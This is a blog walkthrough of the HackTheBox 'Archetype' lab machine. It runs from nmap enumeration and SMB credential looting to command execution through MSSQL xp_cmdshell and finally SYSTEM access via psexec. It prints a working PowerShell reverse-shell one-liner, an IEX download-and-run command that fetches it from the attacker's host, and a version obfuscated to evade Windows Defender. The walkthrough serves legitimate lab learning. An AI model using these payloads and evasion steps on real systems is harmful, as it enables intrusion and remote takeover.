HackTheBox: Archetype

As today I had some time off, and I've only recently found https://app.hackthebox.eu, I've decided to spend some time on their "Starting Point" lab machine set and have some fun removing the rust from my memory.

The first machine we are doing a simple penetration test is called Archetype and apperentely it is a windows machine. Let us start by enumerating the services with nmap:

$nmap -sV -sC 10.10.10.27 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 19:43 CEST
Nmap scan report for 10.10.10.27
Host is up (0.093s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-03T18:03:14
|_Not valid after:  2051-04-03T18:03:14
|_ssl-date: 2021-04-03T18:07:42+00:00; +21m24s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m24s, deviation: 3h07m50s, median: 21m23s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-03T11:07:33-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-03T18:07:36
|_  start_date: N/A

We can see that it is a windows machine with shared files via smb, without providing any user nor login. Let us see what we can list:

$smbclient -N -L \\\\10.10.10.27

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

We can see that backups is accessible to everyone . When trying to connect without password:

$smbclient \\\\10.10.10.27\\backups
Enter WORKGROUP\alacrau's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

		10328063 blocks of size 4096. 8208731 blocks available
smb: \> 
smb: \> pwd
Current directory is \\10.10.10.27\backups\
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Let us now investigate the content of this prod.dtsConfig file:

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

We stumble on our first loot file, so looking through this configuration it looks like we are chasing a sql user, sql_svc:

  • username: sql_svc
  • password: M3g4c0rp123

Let us try to login with these credentials, but first let us search for any help on metasploit to see if we can find anything interesting:

msf6 > search mssql

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/windows/misc/ais_esel_server_rce                  2019-03-27       excellent  Yes    AIS logistics ESEL-Server Unauth SQL Injection RCE
   1   auxiliary/server/capture/mssql                                             normal     No     Authentication Capture: MSSQL
(...)
   31  auxiliary/admin/mssql/mssql_exec                                           normal     No     Microsoft SQL Server xp_cmdshell Command Execution

So aux module 31 looks intersting (and quite notorious):

Description:
  This module will execute a Windows command on a MSSQL/MSDE instance 
  via the xp_cmdshell procedure. A valid username and password is 
  required to use this module

References:
  http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx

Let us use it (msf6 > use 31) and setup the exploit parameters:

msf6 > set PASSWORD M3g4c0rp123
PASSWORD => M3g4c0rp123
msf6 > set USERNAME sql_svc
USERNAME => sql_svc
msf6 > set RHOSTS 10.10.10.27
RHOSTS => 10.10.10.27
msf6 > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true
msf6 > set DOMAIN ARCHETYPE
DOMAIN => ARCHETYPE
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   CMD                  cmd.exe /c echo OWNED  no        Command to execute
                         > C:\owned.exe
   PASSWORD             M3g4c0rp123            no        The password for the specified user
                                                         name
   RHOSTS               10.10.10.27            yes       The target host(s), range CIDR iden
                                                         tifier, or hosts file with syntax '
                                                         file:<path>'
   RPORT                1433                   yes       The target port (TCP)
   TDSENCRYPTION        false                  yes       Use TLS/SSL for TDS data "Force Enc
                                                         ryption"
   USERNAME             sql_svc                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  true                   yes       Use windows authentification (requi
                                                         res DOMAIN option set)

msf6 auxiliary(admin/mssql/mssql_exec) > exploit
....

After running this command we easily check that the machine is exploitable, as we obtain an output from our command, so we can start our process of trying to obtain a shell access over there. Our reverse shell, that we will kindly name lol.ps1, taken from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1, will contain a hit to our local netcat listener:

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.167',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Let us as well fire up our nc listener on port 4242 so it can wait for connections from our reverse shell above:

$nc -lvnp 4242
listening on [any] 4242 ..

Well now start a webserver to serve our reverse shell script so we can download it from inside the machine:

python -m http.server

This will spawn a http server on our machine at port 8000 in order to serve our powershell reverse shell. Then we set the command on metasploit, and run the exploit:

set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'

We will then run this script and we can see that we obtain an Antivirus message for tryting to run our shell code:

msf6 auxiliary(admin/mssql/mssql_exec) > set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
CMD => powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
[*] Running module against 10.10.10.27

[*] 10.10.10.27:1433 - SQL Query: EXEC master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'

 output
 ------
 IEX : At line:1 char:1
 + $client = New-Object System.Net.Sockets.TCPClient("10.10.14.167",4242 ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 This script contains malicious content and has been blocked by your antivirus software.
 At line:1 char:1
 + IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.167:80 ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
 + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Inv
 okeExpressionCommand

[*] Auxiliary module execution completed

In order to bypass this we will need to obfuscate our powershell code so that the Windows defender antivirus does not detect it. For this task we've used the ISESteroids obtainable from http://www.powertheshell.com/isesteroids/. After running the "Obfuscate" tool on our script we obtain a new one:

${____/\/=\/==\__/\}=(New-Object Net.Sockets.TCPClient($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQAwAC4AMQAwAC4AMQA0AC4AMQA2ADcA'))),4242)).GetStream();[byte[]]${__/\_/=\_/\__/=\/}=0..65535|%{0};while((${___/\/=======\/\/}=${____/\/=\/==\__/\}.Read(${__/\_/=\_/\__/=\/},0,${__/\_/=\_/\__/=\/}.Length)) -ne 0){;${__/\/\/==\/=\/\_/}=(New-Object Text.ASCIIEncoding).GetString(${__/\_/=\_/\__/=\/},0,${___/\/=======\/\/});${_/==\___/=\/\__/=}=([text.encoding]::ASCII).GetBytes((iex ${__/\/\/==\/=\/\_/} 2>&1));${____/\/=\/==\__/\}.Write(${_/==\___/=\/\__/=},0,${_/==\___/=\/\__/=}.Length)}

So as we can see above, some of our var names were obfuscated and also our IP address was encoded with base64. When running now the exploit from metasploit we can see now a hit on our netcat session:

$nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.27] 49678

whoami
archetype\sql_svc

As we now have a shell we can start by going through the list of priviledge escalation, having a look into the check list in https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#system-info, and we have a hit when trying to check some command history:

pwd
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
dir
ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit

We can now use a tool to run a remote powershell session (https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) using our newly found credentials:

$python3 psexec.py administrator@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file PtMMrPNw.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SGjW on 10.10.10.27.....
[*] Starting service SGjW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>


C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

As we now have an admin shell on this machine, we can then look around for the flags. We could found them on the "Desktop" folder of the admin:

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,834,831,872 bytes free

C:\Users\Administrator\Desktop>type root.txt
--flag--
C:\Users\Administrator\Desktop>

As we forgot previously, the user flag can be collected from the sql_svc user desktop folder:

C:\Users\sql_svc\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,833,373,696 bytes free

C:\Users\sql_svc\Desktop>type user.txt
--flag--
C:\Users\sql_svc\Desktop>

Easy but fun, this platform is quite cool so I guess I'll keep exploring, so please ping me if you have any doubt.

josé tapadas alves

josé tapadas alves

🪐 Recovering Telecommunications engineer and software tinkerer. Passionate Rubyist and JavaScript zealot. Nature, music and life enthusiast 🌱